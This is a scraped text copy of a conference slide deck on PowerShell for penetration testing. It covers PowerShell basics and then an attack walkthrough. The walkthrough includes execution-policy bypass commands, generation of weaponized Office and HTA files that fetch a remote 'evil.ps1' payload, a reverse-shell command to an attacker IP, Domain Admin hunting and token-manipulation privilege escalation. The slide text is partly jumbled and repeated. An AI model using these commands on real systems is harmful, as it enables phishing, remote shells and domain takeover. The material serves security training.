Nmittal Pentestingpowershell

PowerShell
for
Penetration Testers
Nikhil Mittal
Get-Host
Hacker, Trainer, Speaker, Penetration
Tester
Creator of Kautilya and Nishang.
Twitter: @nikhil_mitt
Blog http://labofapenetrationtester.com
Interested in Offensive Information
Security, new attack vectors and
methodologies to pwn systems.
Previous talks:
Defcon, Blackhat, Troopers, DeepSec,
EuSecwest, Hackfest, PHDays etc.
$PFPTLab = Get-Content
What is PowerShell
Why PowerShell
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
2
Wall of Sheep
Executing commands, scripts and

modules
A Penetration Testing Scenario
Defenses
$PFPTLab | where-object
{$_ -eq
What is PowerShell"}
Windows PowerShell is a task-based
commandline shell and scripting
@nikhil_mitt
3
Wall of Sheep
language designed especially for

system administration. Built on the
.NET Framework, Windows PowerShell
helps IT professionals and power users
control and automate the
administration of the Windows
operating system and applications that
run on Windows.
http://technet.microsoft.com/enus/librar
y/bb978526.aspx
$PFPTLab | where-object
{$_ -eq
@nikhil_mitt
4
Wall of Sheep
Why PowerShell"}
Present by default on modern Windows
OS.
Tightly integrated with Windows and
allows interaction with .Net, Filesystem,
Registry, API, Certificates, COM, native
commands, network, domain etc.
Expandable with use of .Net framework.
Easy to learn.
Less dependency on *nix based tools.
@nikhil_mitt
5
Wall of Sheep
Trusted by System Admins, Blue Teams

and (mostly) AV etc.
about_PowerShell.exe
powershell.exe is the console part of
PowerShell.
Execute native commands, cmdlets,
functions and scripts.
Supports tab completion, command
aliases, Operators etc.
@nikhil_mitt
6
Wall of Sheep
Provides various options and execution
parameters.
$PFPTLab | where-object {$_

-eq
powershell.exe"}
powershell.exe is the console part of
PowerShell.
Execute native commands, cmdlets,
functions and scripts.
@nikhil_mitt
7
Wall of Sheep
Supports tab completion, command
aliases, Operators etc.

Provides various options and execution
parameters.
Get-Help Get-Help
Easy to use and very useful.
This is the first place to go for learning
something new or looking for solution
to a problem.
@nikhil_mitt
8
Wall of Sheep
Detailed help for cmdlets, conceptual

topics, scripts, functions and modules.
Supports wildcards.
You may need to run Update-Help (v3
onwards).
Get-Help Get-Help
Use with about_* to list help about a
conceptual topic.
Various parameters could be passed to
Get-Help
@nikhil_mitt
9
Wall of Sheep
Get-Help Get-Help Full

Get-Help Get-Command -Examples

-eq
cmdlets"}
A Cmdlet is pronounced as command
let.
Cmdlets are task based compiled .Net
classes.
@nikhil_mitt
10
Wall of Sheep
Certainly one of the best features of

PowerShell.
They follow a Verb-Noun naming
convention.
Cmdlets have aliases.
Like every other command in PowerShell,
cmdlets return objects.

-eq
@nikhil_mitt
11
Wall of Sheep
cmdlets"}
Explore cmdlets
Get-Command CommandType
Cmdlet
Explore cmdlets based on a verb GetCommand Verb Get
Get-Command also supports wildcards.
@nikhil_mitt
12
Wall of Sheep
about_Windows_PowerShell
_ISE
A GUI Scripting environment.
Tab completion, context-sensitive help,
syntax highlighting, selective
execution, in-line help are some of the
useful features.
PowerShell scripts have .ps1
extension.
@nikhil_mitt
13
Wall of Sheep
about_Execution_Policies

@nikhil_mitt
14
Wall of Sheep

@nikhil_mitt
15
Wall of Sheep
about_Execution_Policies
Execution Policy is present to stop a user from
accidently running scripts.
There are numerous ways to bypass it:
powershell.exe ExecutionPolicy bypass
.\script.ps1 powershell.exe
EncodedCommand <> powershell.exe
c <>
Read: 15 ways to bypass PowerShell execution
policy
@nikhil_mitt
16
Wall of Sheep
https://www.netspi.com/blog/entryid/238/15ways-tobypass-the-powershell-execution-policy

@nikhil_mitt
17
Wall of Sheep

-eq
Basics of Modules"}
A simplest module is a PowerShell
script with the extension .psm1

Use Get-Module -ListAvailable to list
modules.
Use Import-Module <modulepath>to
import a module.
Use Get-Command Module
@nikhil_mitt
18
Wall of Sheep

-eq
<Modulename> to list functions
exported by a module.
PenTest Scenario"}
Lets consider a Pen Test scenario:

The Goal of this Penetration Test is to get
access to Domain Administrator. (Note that DA is just
being used as an example, in an actual pen test you may like to
discuss a better goal with your client.)

@nikhil_mitt
19
Wall of Sheep

-eq
Server side attacks have been largely
unsuccessful.
Metasploit payloads are being detected by
Anti Virus and other countermeasures.

@nikhil_mitt
20
Wall of Sheep

-eq
PenTest Scenario"}

@nikhil_mitt
21
Wall of Sheep

-eq

@nikhil_mitt
22
Wall of Sheep

-eq

@nikhil_mitt
23
Wall of Sheep
$Exploitation | where-object
{$_ -eq
Client Side Attacks"}
PowerShell is an ideal tool for client side
attacks on a Windows platform.
It could be used for generating
weaponized files for email phishing
campaigns and drive by download
attacks.
@nikhil_mitt
24
Wall of Sheep
{$_ -eq
Lets use Client Side attack scripts from
Nishang
(https://github.com/samratashok/nisha
ng)
The targets for Client Side Attacks mimic
human targets They open links and
attachments emailed to them.

@nikhil_mitt
25
Wall of Sheep
{$_ -eq
Generating weaponized MS Office Files
Out-Word -Payload "powershell.exe
ExecutionPolicy Bypass -noprofile noexit
-c Get-Process
Out-Word -PayloadURL
http://yourwebserver.com/evil.ps1

@nikhil_mitt
26
Wall of Sheep
{$_ -eq
Out-Excel -Payload "powershell.exe
EncodedCommand <>

Drive by download attacks
Out-HTA -PayloadURL
http://192.168.254.1/powerpreter.ps m1
-Arguments Check-VM
More weaponized files

@nikhil_mitt
27
Wall of Sheep
{$_ -eq
Out-CHM
Out-Shortcut
Shells"}
Now that we can run successful client
side attacks, we may need shell level

access for further attacks.
PowerShell can be used to write shells
as well.
@nikhil_mitt
28
Wall of Sheep
{$_ -eq
Shells in PowerShell can be used with
exploits to get access to the target

machine.
Shells"}
Lets use a TCP reverse shell,
InvokePowerShellTcp.ps1 from Nishang.
It also has a one-line version.
On Windows target:
@nikhil_mitt
29
Wall of Sheep
{$_ -eq
Invoke-PowerShellTcp IPAddress
192.168.230.1 Port 443
Use Invoke-Encode from Nishang to
encode Invoke-PowerShellTcp and use it
with a Client Side Attack.

@nikhil_mitt
30
Wall of Sheep
$PostExp = $PFPTLab | whereobject

{$_ -eq Post Exploitation"}
PowerShell is arguably one of the best
tools around for Windows Post

Exploitation.
We have an interactive PowerShell
session on one of the machines on the

@nikhil_mitt
31
Wall of Sheep
target domain and various PowerShell

tools can be used now.
$PostExp | where-object {$_

-eq Domain
Enumeration"}
We can use Powerview
(https://github.com/Veil-

@nikhil_mitt
32
Wall of Sheep
Framework/PowerTools/tree/master/P
ower View) to enumerate the target
domain.
The goal is to find a machine where a
Domain Admin is logged in.

@nikhil_mitt
33
Wall of Sheep

-eq Domain
Enumeration"}
To find machines which have a domain
admin logged in and the current user
has access to that machine:
Invoke-UserHunter CheckAccess

@nikhil_mitt
34
Wall of Sheep

-eq
SQL
Server Enumeration"}
To find machines which have SQL Server
running and the current user has access
to SQL Server:
Get-SqlServer-EscalateCheckAccess

@nikhil_mitt
35
Wall of Sheep

-eq
https://github.com/nullbind/Powershell
ery/b lob/master/Stableish/MSSQL/GetSqlServer-EscalateCheckAccess.psm1
SQL
Server Exploitation"}
Execute PowerShell commands or SQL
queries on the target instance:
@nikhil_mitt
36
Wall of Sheep

-eq
Execute-Command-MSSQL
ComputerName PFPTLAB-File
WindowsAuthentication
In case the SQL Server service itself is
running as DA, its game over.
Otherwise:
Priv
@nikhil_mitt
37
Wall of Sheep

-eq
Escalation"}
We can use the Domain Admin token
on the target machine using
InvokeTokenManipulation and some
PowerShell hackery:
Get-Process -id <DA process> |
Invoke-TokenManipulation
CreateProcess cmd.exe
@nikhil_mitt
38
Wall of Sheep

-eq
Invoke-TokenManipulation is a part of
Powersploit
(https://github.com/mattifestation/PowerSploit
)

@nikhil_mitt
39
Wall of Sheep

-eq
Defenses"}
Log Log Log!
Monitor and Analyze the logs.
Understand flow/use of privileges and
credentials in your environment.
If a determined attacker can break into
any system, a determined system
@nikhil_mitt
40
Wall of Sheep

-eq
administrator can catch any attacker
as well.
Credits"}
Credits/FF to PowerShell hackers (in
no particular order)
@subTee,
@nullbind,@bettersafetynet,
@obscuresec, @mattifestation,
@nikhil_mitt
41
Wall of Sheep

-eq
@JosephBialek, @Carlos_Perez,
@Lee_Holmes,
@ScriptingGuys,
@enigma0x3, @harmj0y and other
PowerShell
bloggers
and
book
writers.
Closing Remarks"}
Bad guys are already using PowerShell,

using it for security testing is
@nikhil_mitt
42
Wall of Sheep

-eq
imperative now. Both for red teams
and blue teams.
PowerShell is the not the future of
Windows Penetration Testing, it is the
present.
Feedback"}
Check out PowerShell for Penetration
Testers two days trainings at:
@nikhil_mitt
43
Wall of Sheep

-eq
http://www.labofapenetrationtester.c
om/p/tr ainings.html#pfptschedule
Nishang is available at
https://github.com/samratashok/nishan
g
Follow me @nikhil_mitt
nikhil.uitrgpv@gmail.com
http://labofapenetrationtester.com/
@nikhil_mitt
44
Wall of Sheep

-eq

@nikhil_mitt
45
Wall of Sheep

Nmittal Pentestingpowershell

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Nmittal Pentestingpowershell

Transféré par

Droits d'auteur :

Formats disponibles

PowerShell

Executing commands, scripts and

language designed especially for

Trusted by System Admins, Blue Teams

Provides various options and execution

$PFPTLab | where-object {$_

Supports tab completion, command

aliases, Operators etc.

Detailed help for cmdlets, conceptual

Get-Help Get-Help Full

$PFPTLab | where-object {$_

Certainly one of the best features of

$PFPTLab | where-object {$_

PowerShell for Penetration Testers DEFCON

PowerShell for Penetration Testers DEFCON

PowerShell for Penetration Testers DEFCON

$PFPTLab | where-object {$_

script with the extension .psm1

$PFPTLab | where-object {$_

Lets consider a Pen Test scenario:

PowerShell for Penetration Testers DEFCON

$PFPTLab | where-object {$_

PowerShell for Penetration Testers DEFCON

$PFPTLab | where-object {$_

PowerShell for Penetration Testers DEFCON

$PFPTLab | where-object {$_

PowerShell for Penetration Testers DEFCON

$PFPTLab | where-object {$_

PowerShell for Penetration Testers DEFCON

Client Side Attacks"}

PowerShell for Penetration Testers DEFCON

Client Side Attacks"}

More weaponized files

side attacks, we may need shell level

exploits to get access to the target

PowerShell for Penetration Testers DEFCON

$PostExp = $PFPTLab | whereobject

tools around for Windows Post

PowerShell for Penetration Testers DEFCON

target domain and various PowerShell

$PostExp | where-object {$_

PowerShell for Penetration Testers DEFCON

PowerShell for Penetration Testers DEFCON

$PostExp | where-object {$_

PowerShell for Penetration Testers DEFCON

$PostExp | where-object {$_

PowerShell for Penetration Testers DEFCON

$PostExp | where-object {$_

$PostExp | where-object {$_

$PostExp | where-object {$_

$PostExp | where-object {$_

PowerShell for Penetration Testers DEFCON

$PFPTLab | where-object {$_

$PFPTLab | where-object {$_

$PFPTLab | where-object {$_

Bad guys are already using PowerShell,

$PFPTLab | where-object {$_

$PFPTLab | where-object {$_

$PFPTLab | where-object {$_

PowerShell for Penetration Testers DEFCON

Vous aimerez peut-être aussi